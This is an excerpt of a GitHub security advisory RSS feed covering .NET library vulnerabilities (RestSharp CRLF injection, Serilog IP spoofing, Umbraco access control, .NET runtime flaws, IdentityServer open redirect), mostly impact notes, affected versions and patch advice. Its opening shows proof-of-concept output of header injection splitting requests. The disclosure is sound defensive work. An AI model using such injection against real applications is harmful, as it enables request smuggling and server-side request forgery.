<span class="pl-s"><span class="pl-v">Accept:</span> application/json, text/json, text/x-json, text/javascript, application/xml, text/xml</span>
<span class="pl-s"><span class="pl-v">Accept-Encoding:</span> gzip, deflate, br</span></pre></div>
<p>But as the application is vulnerable to CRLF injection the above command will instead result in the following two requests being sent:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">GET</span><span class="pl-c1"> /status HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> insert.some.site.here</span>
<span class="pl-s"><span class="pl-v">Authorization:</span> test</span>
<span class="pl-s"><span class="pl-v">User-Agent:</span> injected header!</span></pre></div>
<p>and</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">GET</span><span class="pl-c1"> /smuggled HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> insert.some.site.here</span>
<span class="pl-s"><span class="pl-v">User-Agent:</span> RestSharp/111.4.1.0</span>
<span class="pl-s"><span class="pl-v">Accept:</span> application/json, text/json, text/x-json, text/javascript, application/xml, text/xml</span>
<span class="pl-s"><span class="pl-v">Accept-Encoding:</span> gzip, deflate, br</span></pre></div>
<p>This can be confirmed by checking the access logs on the server where these commands were run (with <code class="notranslate">insert.some.site.here</code> pointing to localhost):</p>
<div class="highlight highlight-source-shell"><pre class="notranslate">anonymous@ubuntu-sofia-672448:<span class="pl-k">~</span>$ sudo tail /var/log/apache2/access.log
127.0.0.1 - - [29/Aug/2024:11:41:11 +0000] <span class="pl-s"><span class="pl-pds">"</span>GET /status HTTP/1.1<span class="pl-pds">"</span></span> 200 240 <span class="pl-s"><span class="pl-pds">"</span>-<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>injected header!<span class="pl-pds">"</span></span>
127.0.0.1 - - [29/Aug/2024:11:41:11 +0000] <span class="pl-s"><span class="pl-pds">"</span>GET /smuggled HTTP/1.1<span class="pl-pds">"</span></span> 404 436 <span class="pl-s"><span class="pl-pds">"</span>-<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>RestSharp/111.4.1.0<span class="pl-pds">"</span></span></pre></div>
<h3>Impact</h3>
<p>If an application using the RestSharp library passes a user-controllable value through to a header, then that application becomes vulnerable to CRLF-injection. This is not necessarily a security issue for a command line application like the one above, but if such code were present in a web application then it becomes vulnerable to request splitting (as shown in the PoC) and thus Server Side Request Forgery.</p>
<p>Strictly speaking this is a potential vulnerability in applications using RestSharp, not in RestSharp itself, but I would argue that at the very least there needs to be a warning about this behaviour in the RestSharp documentation.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-4rr6-2v9v-wcpc" href="https://github.com/restsharp/RestSharp/security/advisories/GHSA-4rr6-2v9v-wcpc">GHSA-4rr6-2v9v-wcpc</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/restsharp/RestSharp/commit/0fba5e727d241b1867bd71efc912594075c2934b/hovercard" href="https://github.com/restsharp/RestSharp/commit/0fba5e727d241b1867bd71efc912594075c2934b">restsharp/RestSharp@<tt>0fba5e7</tt></a></li>
<li><a href="https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32">https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45302" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45302</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4rr6-2v9v-wcpc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4rr6-2v9v-wcpc</guid>
<pubDate>Thu, 29 Aug 2024 19:30:51 GMT</pubDate>
</item>
<item>
<title>Serilog Client IP Spoofing vulnerability</title>
<description><p>Serilog (before v2.1.0) contains a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses in log files by specifying an arbitrary IP as a value of X-Forwarded-For or Client-Ip headers while performing HTTP requests.</p>
<p>It is not possible to configure Serilog.Enrichers.ClientInfo to not trust the X-Forwarded-For header.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44930" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-44930</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1967132009" data-permission-text="Title is private" data-url="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/29" data-hovercard-type="issue" data-hovercard-url="/serilog-contrib/serilog-enrichers-clientinfo/issues/29/hovercard" href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/29">serilog-contrib/serilog-enrichers-clientinfo#29</a></li>
<li><a href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/releases/tag/v2.1.0">https://github.com/serilog-contrib/serilog-enrichers-clientinfo/releases/tag/v2.1.0</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2417399908" data-permission-text="Title is private" data-url="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/38" data-hovercard-type="pull_request" data-hovercard-url="/serilog-contrib/serilog-enrichers-clientinfo/pull/38/hovercard" href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/pull/38">serilog-contrib/serilog-enrichers-clientinfo#38</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/commit/a72051d1900131e6fb30bcfd9491a988167fb6ac/hovercard" href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/commit/a72051d1900131e6fb30bcfd9491a988167fb6ac">serilog-contrib/serilog-enrichers-clientinfo@<tt>a72051d</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-5x5q-cqf6-gj8r</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-5x5q-cqf6-gj8r</guid>
<pubDate>Thu, 29 Aug 2024 18:31:36 GMT</pubDate>
</item>
<item>
<title>Umbraco CMS Improper Access Control vulnerability</title>
<description><h3>Impact</h3>
<p>As an authenticated user one can access a few unintended endpoints</p>
<h3>Explanation of the vulnerability</h3>
<p>Few endpoints in Umbraco Management API was not protected by a specific section. These just required you to be authenticated. Due to the fact that a member is also just authenticated, it was possible to get info from these endpoints using a member token.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-hrww-x3fq-xcvh" href="https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-hrww-x3fq-xcvh">GHSA-hrww-x3fq-xcvh</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43377" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-43377</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/umbraco/Umbraco-CMS/commit/72bef8861d94a39d5cc9530a04c4797b91fcbecf/hovercard" href="https://github.com/umbraco/Umbraco-CMS/commit/72bef8861d94a39d5cc9530a04c4797b91fcbecf">umbraco/Umbraco-CMS@<tt>72bef88</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hrww-x3fq-xcvh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hrww-x3fq-xcvh</guid>
<pubDate>Tue, 20 Aug 2024 18:32:26 GMT</pubDate>
</item>
<item>
<title>Umbraco CMS vulnerable to Generation of Error Message Containing Sensitive Information</title>
<description><h3>Impact</h3>
<p>Some endpoints in the Management API can return stack trace information, even when Umbraco is not in debug mode.</p>
<h3>Explanation of the vulnerability</h3>
<p>Management API endpoints leaked stack traces in case of Internal server errors, no matter if the debug setting was disabled.</p>
<p>E.g. when paging with negative numbers in some apis</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-77gj-crhp-3gvx" href="https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-77gj-crhp-3gvx">GHSA-77gj-crhp-3gvx</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43376" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-43376</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/umbraco/Umbraco-CMS/commit/b76070c794925932cb159ef50b851db6e966a004/hovercard" href="https://github.com/umbraco/Umbraco-CMS/commit/b76070c794925932cb159ef50b851db6e966a004">umbraco/Umbraco-CMS@<tt>b76070c</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-77gj-crhp-3gvx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-77gj-crhp-3gvx</guid>
<pubDate>Tue, 20 Aug 2024 18:25:15 GMT</pubDate>
</item>
<item>
<title>Microsoft Security Advisory CVE-2024-38168 | .NET Denial of Service Vulnerability</title>
<description><h1>Microsoft Security Advisory <a title="CVE-2024-38168" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-7qrv-8f9x-3h32/hovercard" href="https://github.com/advisories/GHSA-7qrv-8f9x-3h32">CVE-2024-38168</a> | .NET Denial of Service Vulnerability</h1>
<h2><a name="user-content-executive-summary"></a>Executive summary</h2>
<p>Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.</p>
<p>A vulnerability exists in .NET when an attacker through unauthenticated requests may trigger a Denial of Service in ASP.NET HTTP.sys web server. This is a windows OS only vulnerability.</p>
<h2>Announcement</h2>
<p>Announcement for this issue can be found at <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2463848613" data-permission-text="Title is private" data-url="https://github.com/dotnet/announcements/issues/320" data-hovercard-type="issue" data-hovercard-url="/dotnet/announcements/issues/320/hovercard" href="https://github.com/dotnet/announcements/issues/320">dotnet/announcements#320</a></p>
<h2><a name="user-content-mitigation-factors"></a>Mitigation factors</h2>
<p>Microsoft has not identified any mitigating factors for this vulnerability.</p>
<h2><a name="user-content-affected-software"></a>Affected software</h2>
<ul>
<li>Any .NET 8.0 application running on .NET 8.0.7 or earlier.</li>
</ul>
<h2><a name="user-content-affected-packages"></a>Affected Packages</h2>
<p>The vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below</p>
<h3><a name="user-content-.net 8"></a>.NET 8</h3>
<markdown-accessiblity-table><table role="table">
<thead>
<tr>
<th>Package name</th>
<th>Affected version</th>
<th>Patched version</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-x86</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
</tbody>
</table></markdown-accessiblity-table>
<h2>Advisory FAQ</h2>
<h3><a name="user-content-how-affected"></a>How do I know if I am affected?</h3>
<p>If you have a runtime or SDK with a version listed, or an affected package listed in <a href="https://github.com/advisories/GHSA-7qrv-8f9x-3h32#affected-packages">affected software</a> or <a href="https://github.com/advisories/GHSA-7qrv-8f9x-3h32#affected-software">affected packages</a>, you're exposed to the vulnerability.</p>
<h3><a name="user-content-how-fix"></a>How do I fix the issue?</h3>
<ul>
<li>To fix the issue please install the latest version of .NET 8.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.</li>
<li>If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the <code class="notranslate">dotnet --info</code> command. You will see output like the following;</li>
</ul>
<pre class="notranslate"><code class="notranslate">.NET Core SDK (reflecting any global.json):
Version: 8.0.200
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 8.0.3
Commit: 8473146e7d
.NET Core SDKs installed:
8.0.200 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspAspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspAspNetCore.App]
Microsoft.AspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.WindowsDesktop.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
</code></pre>
<ul>
<li>If you're using .NET 8.0, you should download and install .NET 8.0.8 Runtime or .NET 8.0.108 SDK (for Visual Studio 2022 v17.8) from <a href="https://dotnet.microsoft.com/download/dotnet-core/8.0" rel="nofollow">https://dotnet.microsoft.com/download/dotnet-core/8.0</a>.</li>
</ul>
<p>.NET 8.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update &amp; Security and then click Check for Updates.</p>
<p>Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.</p>
<p>Additionally, if you've deployed <a href="https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd" rel="nofollow">self-contained applications</a> targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.</p>
<h2>Other Information</h2>
<h3>Reporting Security Issues</h3>
<p>If you have found a potential security issue in .NET 8.0 or .NET 6.0, please email details to <a href="mailto:secure@microsoft.com">secure@microsoft.com</a>. Reports may qualify for the Microsoft .NET Core &amp; .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <a href="https://aka.ms/corebounty" rel="nofollow">https://aka.ms/corebounty</a>.</p>
<h3>Support</h3>
<p>You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at <a href="https://github.com/dotnet/runtime">https://github.com/dotnet/runtime</a> and <a href="https://github.com/dotnet/aspnet/">https://github.com/dotnet/aspnet/</a>. The Announcements repo (<a href="https://github.com/dotnet/Announcements">https://github.com/dotnet/Announcements</a>) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.</p>
<h3>Disclaimer</h3>
<p>The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.</p>
<h3>External Links</h3>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-38168" rel="nofollow">CVE-2024-38168</a></p>
<h3>Revisions</h3>
<p>V1.0 (August 13, 2024): Advisory published.</p>
<p><em>Version 1.0</em></p>
<p><em>Last Updated 2024-08-13</em></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-7qrv-8f9x-3h32" href="https://github.com/dotnet/aspnetcore/security/advisories/GHSA-7qrv-8f9x-3h32">GHSA-7qrv-8f9x-3h32</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38168" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-38168</a></li>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38168" rel="nofollow">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38168</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7qrv-8f9x-3h32</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7qrv-8f9x-3h32</guid>
<pubDate>Tue, 13 Aug 2024 19:27:23 GMT</pubDate>
</item>
<item>
<title>Microsoft Security Advisory CVE-2024-38167 | .NET Information Disclosure Vulnerability</title>
<description><h1>Microsoft Security Advisory <a title="CVE-2024-38167" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-3r34-r6w3-fqp6/hovercard" href="https://github.com/advisories/GHSA-3r34-r6w3-fqp6">CVE-2024-38167</a> | .NET Information Disclosure Vulnerability</h1>
<h2><a name="user-content-executive-summary"></a>Executive summary</h2>
<p>Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.</p>
<p>A vulnerability exists in .NET runtime TlsStream which may result in Information Disclosure.</p>
<h2>Discussion</h2>
<p>Discussion for this issue can be found at <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2463942900" data-permission-text="Title is private" data-url="https://github.com/dotnet/runtime/issues/106359" data-hovercard-type="issue" data-hovercard-url="/dotnet/runtime/issues/106359/hovercard" href="https://github.com/dotnet/runtime/issues/106359">dotnet/runtime#106359</a></p>
<h2><a name="user-content-mitigation-factors"></a>Mitigation factors</h2>
<p>Microsoft has not identified any mitigating factors for this vulnerability.</p>
<h2><a name="user-content-affected-software"></a>Affected software</h2>
<ul>
<li>Any .NET 8.0 application running on .NET 8.0.7 or earlier.</li>
</ul>
<h2><a name="user-content-affected-packages"></a>Affected Packages</h2>
<p>The vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below</p>
<h3><a name="user-content-.net 8"></a>.NET 8</h3>
<markdown-accessiblity-table><table role="table">
<thead>
<tr>
<th>Package name</th>
<th>Affected version</th>
<th>Patched version</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-musl-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-musl-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-musl-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.osx-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.osx-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm" rel="nofollow">Microsoft.NetCore.App.Runtime.win-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.win-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.win-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86" rel="nofollow">Microsoft.NetCore.App.Runtime.win-x86</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
</tbody>
</table></markdown-accessiblity-table>
<h2>Advisory FAQ</h2>
<h3><a name="user-content-how-affected"></a>How do I know if I am affected?</h3>
<p>If you have a runtime or SDK with a version listed, or an affected package listed in <a href="https://github.com/advisories/GHSA-3r34-r6w3-fqp6#affected-packages">affected software</a> or <a href="https://github.com/advisories/GHSA-3r34-r6w3-fqp6#affected-software">affected packages</a>, you're exposed to the vulnerability.</p>
<h3><a name="user-content-how-fix"></a>How do I fix the issue?</h3>
<ul>
<li>To fix the issue please install the latest version of .NET 8.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.</li>
<li>If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the <code class="notranslate">dotnet --info</code> command. You will see output like the following;</li>
</ul>
<pre class="notranslate"><code class="notranslate">.NET Core SDK (reflecting any global.json):
Version: 8.0.200
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 8.0.3
Commit: 8473146e7d
.NET Core SDKs installed:
8.0.200 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspAspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspAspNetCore.App]
Microsoft.AspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.WindowsDesktop.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
</code></pre>
<ul>
<li>If you're using .NET 8.0, you should download and install .NET 8.0.8 Runtime or .NET 8.0.108 SDK (for Visual Studio 2022 v17.8) from <a href="https://dotnet.microsoft.com/download/dotnet-core/8.0" rel="nofollow">https://dotnet.microsoft.com/download/dotnet-core/8.0</a>.</li>
</ul>
<p>.NET 8.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update &amp; Security and then click Check for Updates.</p>
<p>Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.</p>
<p>Additionally, if you've deployed <a href="https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd" rel="nofollow">self-contained applications</a> targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.</p>
<h2>Other Information</h2>
<h3>Reporting Security Issues</h3>
<p>If you have found a potential security issue in .NET 8.0 or .NET 6.0, please email details to <a href="mailto:secure@microsoft.com">secure@microsoft.com</a>. Reports may qualify for the Microsoft .NET Core &amp; .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <a href="https://aka.ms/corebounty" rel="nofollow">https://aka.ms/corebounty</a>.</p>
<h3>Support</h3>
<p>You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at <a href="https://github.com/dotnet/runtime">https://github.com/dotnet/runtime</a> and <a href="https://github.com/dotnet/aspnet/">https://github.com/dotnet/aspnet/</a>. The Announcements repo (<a href="https://github.com/dotnet/Announcements">https://github.com/dotnet/Announcements</a>) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.</p>
<h3>Disclaimer</h3>
<p>The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.</p>
<h3>External Links</h3>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-38167" rel="nofollow">CVE-2024-38167</a></p>
<h3>Revisions</h3>
<p>V1.0 (August 13, 2024): Advisory published.</p>
<p><em>Version 1.0</em></p>
<p><em>Last Updated 2024-08-13</em></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-3r34-r6w3-fqp6" href="https://github.com/dotnet/runtime/security/advisories/GHSA-3r34-r6w3-fqp6">GHSA-3r34-r6w3-fqp6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38167" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-38167</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2463942900" data-permission-text="Title is private" data-url="https://github.com/dotnet/runtime/issues/106359" data-hovercard-type="issue" data-hovercard-url="/dotnet/runtime/issues/106359/hovercard" href="https://github.com/dotnet/runtime/issues/106359">dotnet/runtime#106359</a></li>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38167" rel="nofollow">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38167</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3r34-r6w3-fqp6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3r34-r6w3-fqp6</guid>
<pubDate>Tue, 13 Aug 2024 19:26:10 GMT</pubDate>
</item>
<item>
<title>IdentityServer Open Redirect vulnerability</title>
<description><h3>Impact</h3>
<p>It is possible for an attacker to craft malicious Urls that certain functions in IdentityServer will incorrectly treat as local and trusted. If such a Url is returned as a redirect, some browsers will follow it to a third-party, untrusted site.</p>
<h3>Affected Methods</h3>
<ul>
<li>
<p>In the <code class="notranslate">DefaultIdentityServerInteractionService</code>, the <code class="notranslate">GetAuthorizationContextAsync</code> method may return non-null and the <code class="notranslate">IsValidReturnUrl</code> method may return true for malicious Urls, indicating incorrectly that they can be safely redirected to.</p>
<p><em>UI code calling these two methods is the most commonly used code path that will expose the vulnerability. The default UI templates rely on this behavior in the Login, Challenge, and Consent pages. Customized user interface code might also rely on this behavior. The following uncommonly used APIs are also vulnerable:</em></p>
</li>
<li>
<p>The <code class="notranslate">ServerUrlExtensions.GetIdentityServerRelativeUrl</code>, <code class="notranslate">ReturnUrlParser.ParseAsync</code> and <code class="notranslate">OidcReturnUrlParser.ParseAsync</code> methods may incorrectly return non-null, and the <code class="notranslate">ReturnUrlParser.IsValidReturnUrl</code> and <code class="notranslate">OidcReturnUrlParser.IsValidReturnUrl</code> methods may incorrectly return true for malicious Urls.</p>
</li>
</ul>
<h3>Patches</h3>
<p>IdentityServer4 is no longer supported and will not be receiving updates. Please consider updating to <a href="https://duendesoftware.com/" rel="nofollow">Duende.IdentityServer</a>.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-ff4q-64jc-gx98" href="https://github.com/DuendeSoftware/IdentityServer/security/advisories/GHSA-ff4q-64jc-gx98">GHSA-ff4q-64jc-gx98</a></li>
<li><a title="GHSA-55p7-v223-x366" href="https://github.com/IdentityServer/IdentityServer4/security/advisories/GHSA-55p7-v223-x366">GHSA-55p7-v223-x366</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39694" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-39694</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-55p7-v223-x366</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-55p7-v223-x366</guid>
<pubDate>Wed, 31 Jul 2024 19:57:33 GMT</pubDate>
</item>
<item>
<title>IdentityServer Open Redirect vulnerability</title>
<description><h3>Impact</h3>
<p>It is possible for an attacker to craft malicious Urls that certain functions in IdentityServer will incorrectly treat as local and trusted. If such a Url is returned as a redirect, some browsers will follow it to a third-party, untrusted site.</p>
<p><em>Note: by itself, this vulnerability does <strong>not</strong> allow an attacker to obtain user credentials, authorization codes, access tokens, refresh tokens, or identity tokens. An attacker could however exploit this vulnerability as part of a phishing attack designed to steal user credentials.</em></p>
<h3>Affected Methods</h3>
<ul>
<li>
<p>In the <code class="notranslate">DefaultIdentityServerInteractionService</code>, the <code class="notranslate">GetAuthorizationContextAsync</code> method may return non-null and the <code class="notranslate">IsValidReturnUrl</code> method may return true for malicious Urls, indicating incorrectly that they can be safely redirected to.</p>
<p><em>UI code calling these two methods is the most commonly used code path that will expose the vulnerability. The default UI templates rely on this behavior in the Login, Challenge, Consent, and Account Creation pages. Customized user interface code might also rely on this behavior. The following uncommonly used APIs are also vulnerable:</em></p>
</li>
<li>
<p>The <code class="notranslate">ServerUrlExtensions.GetIdentityServerRelativeUrl</code>, <code class="notranslate">ReturnUrlParser.ParseAsync</code> and <code class="notranslate">OidcReturnUrlParser.ParseAsync</code> methods may incorrectly return non-null, and the <code class="notranslate">ReturnUrlParser.IsValidReturnUrl</code> and <code class="notranslate">OidcReturnUrlParser.IsValidReturnUrl</code> methods may incorrectly return true for malicious Urls.</p>
</li>
</ul>
<h3>Patches</h3>
